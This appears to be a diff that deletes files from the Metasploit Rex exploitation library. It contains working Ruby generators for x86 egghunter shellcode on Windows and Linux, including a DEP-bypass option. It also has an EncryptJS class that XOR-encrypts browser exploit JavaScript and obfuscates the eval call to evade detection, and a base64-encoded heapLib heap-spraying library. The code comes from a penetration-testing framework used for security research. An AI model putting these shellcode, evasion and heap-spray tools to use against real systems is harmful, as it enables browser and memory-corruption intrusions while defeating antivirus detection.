||||
cmds << "del #{@tempdir}#{@var_encoded}.b64"
|
||||
# NOTE: We won't be able to delete the exe while it's in use.
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
# Windows uses & to concat strings
|
||||
def cmd_concat_operator
|
||||
" & "
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,423 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'rex/text'
|
||||
require 'rex/arch'
|
||||
require 'metasm'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
###
|
||||
#
|
||||
# This class provides an interface to generating egghunters. Egghunters are
|
||||
# used to search process address space for a known byte sequence. This is
|
||||
# useful in situations where there is limited room for a payload when an
|
||||
# overflow occurs, but it's possible to stick a larger payload somewhere else
|
||||
# in memory that may not be directly predictable.
|
||||
#
|
||||
# Original implementation by skape
|
||||
# (See http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf)
|
||||
#
|
||||
# Checksum checking implemented by dijital1/corelanc0d3r
|
||||
# Checksum code merged to Egghunter by jduck
|
||||
# Conversion to use Metasm by jduck
|
||||
# Startreg code added by corelanc0d3r
|
||||
# Added routine to disable DEP for discovered egg (for win, added by corelanc0d3r)
|
||||
# Added support for searchforward option (true or false)
|
||||
#
|
||||
###
|
||||
class Egghunter
|
||||
|
||||
###
|
||||
#
|
||||
# Windows-based egghunters
|
||||
#
|
||||
###
|
||||
module Windows
|
||||
Alias = "win"
|
||||
|
||||
module X86
|
||||
Alias = ARCH_X86
|
||||
|
||||
#
|
||||
# The egg hunter stub for win/x86.
|
||||
#
|
||||
def hunter_stub(payload, badchars = '', opts = {})
|
||||
|
||||
startreg = opts[:startreg]
|
||||
searchforward = opts[:searchforward]
|
||||
|
||||
raise RuntimeError, "Invalid egg string! Need 4 bytes." if opts[:eggtag].length != 4
|
||||
marker = "0x%x" % opts[:eggtag].unpack('V').first
|
||||
|
||||
checksum = checksum_stub(payload, badchars, opts)
|
||||
|
||||
startstub = ''
|
||||
if startreg
|
||||
if startreg.downcase != 'edx'
|
||||
startstub = "\n\tmov edx,#{startreg}\n\tjmp next_addr"
|
||||
else
|
||||
startstub = "\n\tjmp next_addr"
|
||||
end
|
||||
end
|
||||
startstub << "\n\t" if startstub.length > 0
|
||||
|
||||
# search forward or backward ?
|
||||
flippage = "\n\tor dx,0xfff"
|
||||
edxdirection = "\n\tinc edx"
|
||||
|
||||
if searchforward.to_s.downcase == 'false'
|
||||
# go backwards
|
||||
flippage = "\n\txor dl,dl"
|
||||
edxdirection = "\n\tdec edx"
|
||||
end
|
||||
|
||||
# other vars
|
||||
getpointer = ''
|
||||
getsize = ''
|
||||
getalloctype = ''
|
||||
getpc = ''
|
||||
jmppayload = "jmp edi"
|
||||
|
||||
apireg = opts[:depreg] || 'esi'
|
||||
apidest = opts[:depdest]
|
||||
depsize = opts[:depsize]
|
||||
|
||||
freeregs = [ "esi", "ebp", "ecx", "ebx" ]
|
||||
|
||||
reginfo = {
|
||||
"ebx"=>["bx","bl","bh"],
|
||||
"ecx"=>["cx","cl","ch"]
|
||||
}
|
||||
|
||||
if opts[:depmethod]
|
||||
|
||||
if freeregs.index(apireg) == nil
|
||||
getpointer << "mov #{freeregs[0]},#{apireg}\n\t"
|
||||
apireg = freeregs[0]
|
||||
end
|
||||
freeregs.delete(apireg)
|
||||
|
||||
if opts[:depmethod].downcase == "virtualalloc"
|
||||
depsize = 0xfff
|
||||
end
|
||||
|
||||
if opts[:depmethod].downcase == "copy" || opts[:depmethod].downcase == "copy_size"
|
||||
if apidest
|
||||
if freeregs.index(apidest) == nil
|
||||
getpointer << "mov #{freeregs[0]},#{apidest}\n\t"
|
||||
apidest = freeregs[0]
|
||||
end
|
||||
else
|
||||
getpc = "fldpi\n\tfstenv [esp-0xc]\n\tpop #{freeregs[0]}\n\t"
|
||||
apidest = freeregs[0]
|
||||
end
|
||||
freeregs.delete(apidest)
|
||||
end
|
||||
|
||||
|
||||
sizereg = freeregs[0]
|
||||
|
||||
if not depsize
|
||||
depsize = payload.length * 2
|
||||
if opts[:depmethod]
|
||||
if opts[:depmethod].downcase == "copy_size"
|
||||
depsize = payload.length
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
if depsize <= 127
|
||||
getsize << "push 0x%02x\n\t" % depsize
|
||||
else
|
||||
sizebytes = "%04x" % depsize
|
||||
low = sizebytes[2,4]
|
||||
high = sizebytes[0,2]
|
||||
if sizereg == "ecx" || sizereg == "ebx"
|
||||
regvars = reginfo[sizereg]
|
||||
getsize << "xor #{sizereg},#{sizereg}\n\t"
|
||||
if low != "00" and high != "00"
|
||||
getsize << "mov #{regvars[0]},0x%s\n\t" % sizebytes
|
||||
elsif low != "00"
|
||||
getsize << "mov #{regvars[1]},0x%s\n\t" % low
|
||||
elsif high != "00"
|
||||
getsize << "mov #{regvars[2]},0x%s\n\t" % high
|
||||
end
|
||||
end
|
||||
if sizereg == "ebp"
|
||||
if low != "00" and high != "00"
|
||||
getsize << "xor #{sizereg},#{sizereg}\n\t"
|
||||
getsize << "mov bp,0x%s\n\t" % sizebytes
|
||||
end
|
||||
end
|
||||
# last resort
|
||||
if getsize == ''
|
||||
blockcnt = 0
|
||||
vpsize = 0
|
||||
blocksize = depsize
|
||||
while blocksize > 127
|
||||
blocksize = blocksize / 2
|
||||
blockcnt += 1
|
||||
end
|
||||
getsize << "xor #{sizereg},#{sizereg}\n\tadd #{sizereg},0x%02x\n\t" % blocksize
|
||||
vpsize = blocksize
|
||||
depblockcnt = 0
|
||||
while depblockcnt < blockcnt
|
||||
getsize << "add #{sizereg},#{sizereg}\n\t"
|
||||
vpsize += vpsize
|
||||
depblockcnt += 1
|
||||
end
|
||||
delta = depsize - vpsize
|
||||
if delta > 0
|
||||
getsize << "add #{sizereg},0x%02x\n\t" % delta
|
||||
end
|
||||
end
|
||||
if opts[:depmethod].downcase == "virtualalloc"
|
||||
getsize << "inc #{sizereg}\n\t"
|
||||
end
|
||||
|
||||
getsize << "push #{sizereg}\n\t"
|
||||
|
||||
end
|
||||
|
||||
getalloctype = getsize
|
||||
|
||||
case opts[:depmethod].downcase
|
||||
when "virtualprotect"
|
||||
jmppayload = "push esp\n\tpush 0x40\n\t"
|
||||
jmppayload << getsize
|
||||
jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
|
||||
when "virtualalloc"
|
||||
jmppayload = "push 0x40\n\t"
|
||||
jmppayload << getalloctype
|
||||
jmppayload << "push 0x01\n\t"
|
||||
jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
|
||||
when "copy"
|
||||
jmppayload = getpc
|
||||
jmppayload << "push edi\n\tpush #{apidest}\n\tpush #{apidest}\n\tpush #{apireg}\n\tmov edi,#{apidest}\n\tret"
|
||||
when "copy_size"
|
||||
jmppayload = getpc
|
||||
jmppayload << getsize
|
||||
jmppayload << "push edi\n\tpush #{apidest}\n\tpush #{apidest}\n\tpush #{apireg}\n\tmov edi,#{apidest}\n\tret"
|
||||
end
|
||||
end
|
||||
|
||||
jmppayload << "\n" if jmppayload.length > 0
|
||||
|
||||
assembly = <<EOS
|
||||
#{getpointer}
|
||||
#{startstub}
|
||||
check_readable:
|
||||
#{flippage}
|
||||
next_addr:
|
||||
#{edxdirection}
|
||||
push edx
|
||||
push 0x02 ; use NtAccessCheckAndAuditAlarm syscall
|
||||
pop eax
|
||||
int 0x2e
|
||||
cmp al,5
|
||||
pop edx
|
||||
je check_readable
|
||||
check_for_tag:
|
||||
; check that the tag matches once
|
||||
mov eax,#{marker}
|
||||
mov edi,edx
|
||||
scasd
|
||||
jne next_addr
|
||||
; it must match a second time too
|
||||
scasd
|
||||
jne next_addr
|
||||
; check the checksum if the feature is enabled
|
||||
#{checksum}
|
||||
; jump to the payload
|
||||
#{jmppayload}
|
||||
EOS
|
||||
|
||||
assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
|
||||
|
||||
# return the stub
|
||||
assembled_code
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# Linux-based egghunters
|
||||
#
|
||||
###
|
||||
module Linux
|
||||
Alias = "linux"
|
||||
|
||||
module X86
|
||||
Alias = ARCH_X86
|
||||
|
||||
#
|
||||
# The egg hunter stub for linux/x86.
|
||||
#
|
||||
def hunter_stub(payload, badchars = '', opts = {})
|
||||
|
||||
startreg = opts[:startreg]
|
||||
|
||||
raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
|
||||
marker = "0x%x" % opts[:eggtag].unpack('V').first
|
||||
|
||||
checksum = checksum_stub(payload, badchars, opts)
|
||||
|
||||
startstub = ''
|
||||
if startreg
|
||||
if startreg.downcase != 'ecx'
|
||||
startstub = "\n\tmov ecx,#{startreg}\n\tjmp next_addr"
|
||||
else
|
||||
startstub = "\n\tjmp next_addr"
|
||||
end
|
||||
end
|
||||
startstub << "\n\t" if startstub.length > 0
|
||||
|
||||
assembly = <<EOS
|
||||
cld
|
||||
#{startstub}
|
||||
check_readable:
|
||||
or cx,0xfff
|
||||
next_addr:
|
||||
inc ecx
|
||||
push 0x43 ; use 'sigaction' syscall
|
||||
pop eax
|
||||
int 0x80
|
||||
cmp al,0xf2
|
||||
je check_readable
|
||||
|
||||
check_for_tag:
|
||||
; check that the tag matches once
|
||||
mov eax,#{marker}
|
||||
mov edi,ecx
|
||||
scasd
|
||||
jne next_addr
|
||||
; it must match a second time too
|
||||
scasd
|
||||
jne next_addr
|
||||
|
||||
; check the checksum if the feature is enabled
|
||||
#{checksum}
|
||||
|
||||
; jump to the payload
|
||||
jmp edi
|
||||
EOS
|
||||
|
||||
assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
|
||||
|
||||
# return the stub
|
||||
assembled_code
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# Generic interface
|
||||
#
|
||||
###
|
||||
|
||||
#
|
||||
# Creates a new egghunter instance and acquires the sub-class that should
|
||||
# be used for generating the stub based on the supplied platform and
|
||||
# architecture.
|
||||
#
|
||||
def initialize(platform, arch = nil)
|
||||
Egghunter.constants.each { |c|
|
||||
mod = self.class.const_get(c)
|
||||
|
||||
next if ((!mod.kind_of?(::Module)) or
|
||||
(!mod.const_defined?('Alias')))
|
||||
|
||||
if (platform =~ /#{mod.const_get('Alias')}/i)
|
||||
self.extend(mod)
|
||||
|
||||
if (arch and mod)
|
||||
mod.constants.each { |a|
|
||||
amod = mod.const_get(a)
|
||||
|
||||
next if ((!amod.kind_of?(::Module)) or
|
||||
(!amod.const_defined?('Alias')))
|
||||
|
||||
if (arch =~ /#{mod.const_get(a).const_get('Alias')}/i)
|
||||
amod = mod.const_get(a)
|
||||
|
||||
self.extend(amod)
|
||||
end
|
||||
}
|
||||
end
|
||||
end
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# This method generates an egghunter using the derived hunter stub.
|
||||
#
|
||||
def generate(payload, badchars = '', opts = {})
|
||||
# set defaults if options are missing
|
||||
|
||||
# NOTE: there is no guarantee this won't exist in memory, even when doubled.
|
||||
# To address this, use the checksum feature :)
|
||||
opts[:eggtag] ||= Rex::Text.rand_text(4, badchars)
|
||||
|
||||
# Generate the hunter_stub portion
|
||||
return nil if ((hunter = hunter_stub(payload, badchars, opts)) == nil)
|
||||
|
||||
# Generate the marker bits to be prefixed to the real payload
|
||||
egg = ''
|
||||
egg << opts[:eggtag] * 2
|
||||
egg << payload
|
||||
if opts[:checksum]
|
||||
cksum = 0
|
||||
payload.each_byte { |b|
|
||||
cksum += b
|
||||
}
|
||||
egg << [cksum & 0xff].pack('C')
|
||||
end
|
||||
|
||||
return [ hunter, egg ]
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
#
|
||||
# Stub method that is meant to be overridden. It returns the raw stub that
|
||||
# should be used as the egghunter.
|
||||
#
|
||||
def hunter_stub(payload, badchars = '', opts = {})
|
||||
end
|
||||
|
||||
def checksum_stub(payload, badchars = '', opts = {})
|
||||
return '' if not opts[:checksum]
|
||||
|
||||
if payload.length < 0x100
|
||||
cmp_reg = "cl"
|
||||
elsif payload.length < 0x10000
|
||||
cmp_reg = "cx"
|
||||
else
|
||||
raise RuntimeError, "Payload too big!"
|
||||
end
|
||||
egg_size = "0x%x" % payload.length
|
||||
|
||||
checksum = <<EOS
|
||||
push ecx
|
||||
xor ecx,ecx
|
||||
xor eax,eax
|
||||
calc_chksum_loop:
|
||||
add al,byte [edi+ecx]
|
||||
inc ecx
|
||||
cmp #{cmp_reg},#{egg_size}
|
||||
jnz calc_chksum_loop
|
||||
test_chksum:
|
||||
cmp al,byte [edi+ecx]
|
||||
pop ecx
|
||||
jnz next_addr
|
||||
EOS
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -1,78 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
#
|
||||
# Encrypts javascript code
|
||||
#
|
||||
class EncryptJS
|
||||
#
|
||||
# Encrypts a javascript string.
|
||||
#
|
||||
# Encrypts a javascript string via XOR using a given key.
|
||||
# The key must be passed to the executed javascript
|
||||
# so that it can decrypt itself.
|
||||
# The provided loader gets the key from
|
||||
# "location.search.substring(1)"
|
||||
#
|
||||
# This should bypass any detection of the file itself
|
||||
# as information not part of the file is needed to
|
||||
# decrypt the original javascript code.
|
||||
#
|
||||
# Example:
|
||||
# <code>
|
||||
# js = <<ENDJS
|
||||
# function say_hi() {
|
||||
# var foo = "Hello, world";
|
||||
# document.writeln(foo);
|
||||
# }
|
||||
# ENDJS
|
||||
# key = 'secret'
|
||||
# js_encrypted = EncryptJS.encrypt(js, key)
|
||||
# </code>
|
||||
#
|
||||
# You might use something like this in exploit
|
||||
# modules to pass the key to the javascript
|
||||
# <code>
|
||||
# if (!request.uri.match(/\?\w+/))
|
||||
# send_local_redirect(cli, "?#{@key}")
|
||||
# return
|
||||
# end
|
||||
# </code>
|
||||
#
|
||||
|
||||
def self.encrypt(js, key)
|
||||
js.gsub!(/[\r\n]/, '')
|
||||
|
||||
encoded = Rex::Encoding::Xor::Generic.encode(js, key)[0].unpack("H*")[0]
|
||||
|
||||
# obfuscate the eval call to circumvent generic detection
|
||||
eval = 'eval'.split(//).join(Rex::Text.rand_text_alpha(rand(5)).upcase)
|
||||
eval_call = 'window["' + eval + '".replace(/[A-Z]/g,"")]'
|
||||
|
||||
js_loader = Rex::Exploitation::ObfuscateJS.new <<-ENDJS
|
||||
var exploit = '#{encoded}';
|
||||
var encoded = '';
|
||||
for (i = 0;i<exploit.length;i+=2) {
|
||||
encoded += String.fromCharCode(parseInt(exploit.substring(i, i+2), 16));
|
||||
}
|
||||
var pass = location.search.substring(1);
|
||||
var decoded = '';
|
||||
for (i=0;i<encoded.length;i++) {
|
||||
decoded += String.fromCharCode(encoded.charCodeAt(i) ^ pass.charCodeAt(i%pass.length));
|
||||
}
|
||||
#{eval_call}(decoded);
|
||||
ENDJS
|
||||
|
||||
js_loader.obfuscate(
|
||||
'Symbols' => {
|
||||
'Variables' => [ 'exploit', 'encoded', 'pass', 'decoded' ],
|
||||
},
|
||||
'Strings' => false
|
||||
)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -1,331 +0,0 @@
|
|||
Ly8NCi8vICAgSmF2YVNjcmlwdCBIZWFwIEV4cGxvaXRhdGlvbiBsaWJyYXJ5
|
||||
DQovLyAgIGJ5IEFsZXhhbmRlciBTb3Rpcm92IDxhc290aXJvdkBkZXRlcm1p
|
||||
bmEuY29tPg0KLy8gIA0KLy8gICBWZXJzaW9uIDAuMw0KLy8NCi8vIENvcHly
|
||||
aWdodCAoYykgMjAwNywgQWxleGFuZGVyIFNvdGlyb3YNCi8vIEFsbCByaWdo
|
||||
dHMgcmVzZXJ2ZWQuDQovLyANCi8vIFRoZSBIZWFwTGliIGxpYnJhcnkgaXMg
|
||||
bGljZW5zZWQgdW5kZXIgYSBCU0QgbGljZW5zZSwgdGhlIHRleHQgb2Ygd2hp
|
||||
Y2ggZm9sbG93czoNCi8vIA0KLy8gUmVkaXN0cmlidXRpb24gYW5kIHVzZSBp
|
||||
biBzb3VyY2UgYW5kIGJpbmFyeSBmb3Jtcywgd2l0aCBvciB3aXRob3V0DQov
|
||||
LyBtb2RpZmljYXRpb24sIGFyZSBwZXJtaXR0ZWQgcHJvdmlkZWQgdGhhdCB0
|
||||
aGUgZm9sbG93aW5nIGNvbmRpdGlvbnMNCi8vIGFyZSBtZXQ6DQovLyANCi8v
|
||||
IDEuIFJlZGlzdHJpYnV0aW9ucyBvZiBzb3VyY2UgY29kZSBtdXN0IHJldGFp
|
||||
biB0aGUgYWJvdmUgY29weXJpZ2h0DQovLyAgICBub3RpY2UsIHRoaXMgbGlz
|
||||
dCBvZiBjb25kaXRpb25zIGFuZCB0aGUgZm9sbG93aW5nIGRpc2NsYWltZXIu
|
||||
DQovLyAyLiBSZWRpc3RyaWJ1dGlvbnMgaW4gYmluYXJ5IGZvcm0gbXVzdCBy
|
||||
ZXByb2R1Y2UgdGhlIGFib3ZlIGNvcHlyaWdodA0KLy8gICAgbm90aWNlLCB0
|
||||
aGlzIGxpc3Qgb2YgY29uZGl0aW9ucyBhbmQgdGhlIGZvbGxvd2luZyBkaXNj
|
||||
bGFpbWVyIGluIHRoZQ0KLy8gICAgZG9jdW1lbnRhdGlvbiBhbmQvb3Igb3Ro
|
||||
ZXIgbWF0ZXJpYWxzIHByb3ZpZGVkIHdpdGggdGhlIGRpc3RyaWJ1dGlvbi4N
|
||||
Ci8vIDMuIE5laXRoZXIgdGhlIG5hbWUgb2YgQWxleGFuZGVyIFNvdGlyb3Yg
|
||||
bm9yIHRoZSBuYW1lIG9mIERldGVybWluYSBJbmMuDQovLyAgICBtYXkgYmUg
|
||||
dXNlZCB0byBlbmRvcnNlIG9yIHByb21vdGUgcHJvZHVjdHMgZGVyaXZlZCBm
|
||||
cm9tIHRoaXMgc29mdHdhcmUNCi8vICAgIHdpdGhvdXQgc3BlY2lmaWMgcHJp
|
||||
b3Igd3JpdHRlbiBwZXJtaXNzaW9uLg0KLy8gDQovLyBUSElTIFNPRlRXQVJF
|
||||
IElTIFBST1ZJREVEIEJZIFRIRSBDT1BZUklHSFQgSE9MREVSUyBBTkQgQ09O
|
||||
VFJJQlVUT1JTICJBUyBJUyINCi8vIEFORCBBTlkgRVhQUkVTUyBPUiBJTVBM
|
||||
SUVEIFdBUlJBTlRJRVMsIElOQ0xVRElORywgQlVUIE5PVCBMSU1JVEVEIFRP
|
||||
LCBUSEUNCi8vIElNUExJRUQgV0FSUkFOVElFUyBPRiBNRVJDSEFOVEFCSUxJ
|
||||
VFkgQU5EIEZJVE5FU1MgRk9SIEEgUEFSVElDVUxBUiBQVVJQT1NFDQovLyBB
|
||||
UkUgRElTQ0xBSU1FRC4gSU4gTk8gRVZFTlQgU0hBTEwgVEhFIENPUFlSSUdI
|
||||
VCBPV05FUiBPUiBDT05UUklCVVRPUlMgQkUNCi8vIExJQUJMRSBGT1IgQU5Z
|
||||
IERJUkVDVCwgSU5ESVJFQ1QsIElOQ0lERU5UQUwsIFNQRUNJQUwsIEVYRU1Q
|
||||
TEFSWSwgT1INCi8vIENPTlNFUVVFTlRJQUwgREFNQUdFUyAoSU5DTFVESU5H
|
||||
LCBCVVQgTk9UIExJTUlURUQgVE8sIFBST0NVUkVNRU5UIE9GDQovLyBTVUJT
|
||||
VElUVVRFIEdPT0RTIE9SIFNFUlZJQ0VTOyBMT1NTIE9GIFVTRSwgREFUQSwg
|
||||
T1IgUFJPRklUUzsgT1IgQlVTSU5FU1MNCi8vIElOVEVSUlVQVElPTikgSE9X
|
||||
RVZFUiBDQVVTRUQgQU5EIE9OIEFOWSBUSEVPUlkgT0YgTElBQklMSVRZLCBX
|
||||
SEVUSEVSIElODQovLyBDT05UUkFDVCwgU1RSSUNUIExJQUJJTElUWSwgT1Ig
|
||||
VE9SVCAoSU5DTFVESU5HIE5FR0xJR0VOQ0UgT1IgT1RIRVJXSVNFKQ0KLy8g
|
||||
QVJJU0lORyBJTiBBTlkgV0FZIE9VVCBPRiBUSEUgVVNFIE9GIFRISVMgU09G
|
||||
VFdBUkUsIEVWRU4gSUYgQURWSVNFRCBPRiBUSEUNCi8vIFBPU1NJQklMSVRZ
|
||||
IE9GIFNVQ0ggREFNQUdFLg0KLy8NCiANCi8vDQovLyBoZWFwTGliIG5hbWVz
|
||||
cGFjZQ0KLy8NCg0KZnVuY3Rpb24gaGVhcExpYigpIHsNCn0NCg0KDQovLw0K
|
||||
Ly8gaGVhcExpYiBjbGFzcw0KLy8NCg0KLy8gaGVhcExpYi5pZSBjb25zdHJ1
|
||||
Y3Rvcg0KLy8NCi8vIENyZWF0ZXMgYSBuZXcgaGVhcExpYiBBUEkgb2JqZWN0
|
||||
IGZvciBJbnRlcm5ldCBFeHBsb3Jlci4gVGhlIG1heEFsbG9jDQovLyBhcmd1
|
||||
bWVudCBzZXRzIHRoZSBtYXhpbXVtIGJsb2NrIHNpemUgdGhhdCBjYW4gYmUg
|
||||
YWxsb2NhdGVkIHVzaW5nIHRoZSBhbGxvYygpDQovLyBmdW5jdGlvbi4NCi8v
|
||||
DQovLyBBcmd1bWVudHM6DQovLyAgICBtYXhBbGxvYyAtIG1heGltdW0gYWxs
|
||||
b2NhdGlvbiBzaXplIGluIGJ5dGVzIChkZWZhdWx0cyB0byA2NTUzNSkNCi8v
|
||||
ICAgIGhlYXBCYXNlIC0gYmFzZSBvZiB0aGUgZGVmYXVsdCBwcm9jZXNzIGhl
|
||||
YXAgKGRlZmF1bHRzIHRvIDB4MTUwMDAwKQ0KLy8NCg0KaGVhcExpYi5pZSA9
|
||||
IGZ1bmN0aW9uKG1heEFsbG9jLCBoZWFwQmFzZSkgew0KDQogICAgdGhpcy5t
|
||||
YXhBbGxvYyA9IChtYXhBbGxvYyA/IG1heEFsbG9jIDogNjU1MzUpOw0KICAg
|
||||
IHRoaXMuaGVhcEJhc2UgPSAoaGVhcEJhc2UgPyBoZWFwQmFzZSA6IDB4MTUw
|
||||
MDAwKTsNCg0KICAgIC8vIEFsbG9jYXRlIGEgcGFkZGluZyBzdHJpbmcgdGhh
|
||||
dCB1c2VzIG1heEFsbG9jIGJ5dGVzDQogICAgdGhpcy5wYWRkaW5nU3RyID0g
|
||||
IkFBQUEiOw0KDQogICAgd2hpbGUgKDQgKyB0aGlzLnBhZGRpbmdTdHIubGVu
|
||||
Z3RoKjIgKyAyIDwgdGhpcy5tYXhBbGxvYykgew0KICAgICAgICB0aGlzLnBh
|
||||
ZGRpbmdTdHIgKz0gdGhpcy5wYWRkaW5nU3RyOw0KICAgIH0NCiAgICANCiAg
|
||||
ICAvLyBDcmVhdGUgYW4gYXJyYXkgZm9yIHN0b3JpbmcgcmVmZXJlbmNlcyB0
|
||||
byBhbGxvY2F0ZWQgbWVtb3J5DQogICAgdGhpcy5tZW0gPSBuZXcgQXJyYXko
|
||||
KTsNCg0KICAgIC8vIENhbGwgZmx1c2hPbGVhdXQzMigpIG9uY2UgdG8gYWxs
|
||||
b2NhdGUgdGhlIG1heGltdW0gc2l6ZSBibG9ja3MNCiAgICB0aGlzLmZsdXNo
|
||||
T2xlYXV0MzIoKTsNCn0NCg0KDQovLw0KLy8gT3V0cHV0cyBhIGRlYnVnZ2lu
|
||||
ZyBtZXNzYWdlIGluIFdpbkRiZy4gVGhlIG1zZyBhcmd1bWVudCBtdXN0IGJl
|
||||
IGEgc3RyaW5nDQovLyBsaXRlcmFsLiBVc2luZyBzdHJpbmcgY29uY2F0ZW5h
|
||||
dGlvbiB0byBidWlsZCB0aGUgbWVzc2FnZSB3aWxsIHJlc3VsdCBpbiBoZWFw
|
||||
DQovLyBhbGxvY2F0aW9ucy4NCi8vDQovLyBBcmd1bWVudHM6DQovLyAgICBt
|
||||
c2cgLSBzdHJpbmcgdG8gb3V0cHV0DQovLw0KDQpoZWFwTGliLmllLnByb3Rv
|
||||
dHlwZS5kZWJ1ZyA9IGZ1bmN0aW9uKG1zZykgew0KICAgIHZvaWQoTWF0aC5h
|
||||
dGFuMigweGJhYmUsIG1zZykpOw0KfQ0KDQoNCi8vDQovLyBFbmFibGVzIG9y
|
||||
IGRpc2FibGVzIGxvZ2dpbmcgb2YgaGVhcCBvcGVyYXRpb25zIGluIFdpbkRi
|
||||
Zy4NCi8vDQovLyBBcmd1bWVudHM6DQovLyAgICBlbmFibGUgLSBhIGJvb2xl
|
||||
YW4gdmFsdWUsIHNldCB0byB0cnVlIHRvIGVuYWJsZSBoZWFwIGxvZ2dpbmcN
|
||||
Ci8vDQoNCmhlYXBMaWIuaWUucHJvdG90eXBlLmRlYnVnSGVhcCA9IGZ1bmN0
|
||||
aW9uKGVuYWJsZSkgew0KDQogICAgaWYgKGVuYWJsZSA9PSB0cnVlKQ0KICAg
|
||||
ICAgICB2b2lkKE1hdGguYXRhbigweGJhYmUpKTsNCiAgICBlbHNlDQogICAg
|
||||
ICAgIHZvaWQoTWF0aC5hc2luKDB4YmFiZSkpOw0KfQ0KDQoNCi8vDQovLyBU
|
||||
cmlnZ2VycyBhIGJyZWFrcG9pbnQgaW4gdGhlIGRlYnVnZ2VyLg0KLy8NCg0K
|
||||
aGVhcExpYi5pZS5wcm90b3R5cGUuZGVidWdCcmVhayA9IGZ1bmN0aW9uKG1z
|
||||
Zykgew0KICAgIHZvaWQoTWF0aC5hY29zKDB4YmFiZSkpOw0KfQ0KDQoNCi8v
|
||||
DQovLyBSZXR1cm5zIGEgc3RyaW5nIG9mIGEgc3BlY2lmaWVkIGxlbmd0aCwg
|
||||
dXAgdG8gdGhlIG1heGltdW0gYWxsb2NhdGlvbiBzaXplDQovLyBzZXQgaW4g
|
||||
dGhlIGhlYXBMaWIuaWUgY29uc3RydWN0b3IuIFRoZSBzdHJpbmcgY29udGFp
|
||||
bnMgIkEiIGNoYXJhY3RlcnMuDQovLw0KLy8gQXJndW1lbnRzOg0KLy8gICAg
|
||||
bGVuIC0gbGVuZ3RoIGluIGNoYXJhY3RlcnMNCi8vDQoNCmhlYXBMaWIuaWUu
|
||||
cHJvdG90eXBlLnBhZGRpbmcgPSBmdW5jdGlvbihsZW4pIHsNCiAgICBpZiAo
|
||||
bGVuID4gdGhpcy5wYWRkaW5nU3RyLmxlbmd0aCkNCiAgICAgICAgdGhyb3cg
|
||||
IlJlcXVlc3RlZCBwYWRkaW5nIHN0cmluZyBsZW5ndGggIiArIGxlbiArICIs
|
||||
IG9ubHkgIiArIHRoaXMucGFkZGluZ1N0ci5sZW5ndGggKyAiIGF2YWlsYWJs
|
||||
ZSI7DQoNCiAgICByZXR1cm4gdGhpcy5wYWRkaW5nU3RyLnN1YnN0cigwLCBs
|
||||
ZW4pOw0KfQ0KDQoNCi8vDQovLyBSZXR1cm5zIGEgbnVtYmVyIHJvdW5kZWQg
|
||||
dXAgdG8gYSBzcGVjaWZpZWQgdmFsdWUuDQovLw0KLy8gQXJndW1lbnRzOg0K
|
||||
Ly8gICAgbnVtICAgLSBpbnRlZ2VyIHRvIHJvdW5kDQovLyAgICByb3VuZCAt
|
||||
IHZhbHVlIHRvIHJvdW5kIHRvDQovLw0KDQpoZWFwTGliLmllLnByb3RvdHlw
|
||||
ZS5yb3VuZCA9IGZ1bmN0aW9uKG51bSwgcm91bmQpIHsNCiAgICBpZiAocm91
|
||||
bmQgPT0gMCkNCiAgICAgICAgdGhyb3cgIlJvdW5kIGFyZ3VtZW50IGNhbm5v
|
||||
dCBiZSAwIjsNCg0KICAgIHJldHVybiBwYXJzZUludCgobnVtICsgKHJvdW5k
|
||||
LTEpKSAvIHJvdW5kKSAqIHJvdW5kOw0KfQ0KDQoNCi8vDQovLyBDb252ZXJ0
|
||||
cyBhbiBpbnRlZ2VyIHRvIGEgaGV4IHN0cmluZy4gVGhpcyBmdW5jdGlvbiB1
|
||||
c2VzIHRoZSBoZWFwLg0KLy8NCi8vIEFyZ3VtZW50czoNCi8vICAgIG51bSAg
|
||||
IC0gaW50ZWdlciB0byBjb252ZXJ0DQovLyAgICB3aWR0aCAtIHBhZCB0aGUg
|
||||
b3V0cHV0IHdpdGggemVyb3MgdG8gYSBzcGVjaWZpZWQgd2lkdGggKG9wdGlv
|
||||
bmFsKQ0KLy8NCg0KaGVhcExpYi5pZS5wcm90b3R5cGUuaGV4ID0gZnVuY3Rp
|
||||
b24obnVtLCB3aWR0aCkNCnsNCiAgICB2YXIgZGlnaXRzID0gIjAxMjM0NTY3
|
||||
ODlBQkNERUYiOw0KDQogICAgdmFyIGhleCA9IGRpZ2l0cy5zdWJzdHIobnVt
|
||||
ICYgMHhGLCAxKTsNCg0KICAgIHdoaWxlIChudW0gPiAweEYpIHsNCiAgICAg
|
||||
ICAgbnVtID0gbnVtID4+PiA0Ow0KICAgICAgICBoZXggPSBkaWdpdHMuc3Vi
|
||||
c3RyKG51bSAmIDB4RiwgMSkgKyBoZXg7DQogICAgfQ0KDQogICAgdmFyIHdp
|
||||
ZHRoID0gKHdpZHRoID8gd2lkdGggOiAwKTsNCg0KICAgIHdoaWxlIChoZXgu
|
||||
bGVuZ3RoIDwgd2lkdGgpDQogICAgICAgIGhleCA9ICIwIiArIGhleDsNCg0K
|
||||
ICAgIHJldHVybiBoZXg7DQp9DQoNCg0KLy8NCi8vIENvbnZlcnQgYSAzMi1i
|
||||
aXQgYWRkcmVzcyB0byBhIDQtYnl0ZSBzdHJpbmcgd2l0aCB0aGUgc2FtZSBy
|
||||
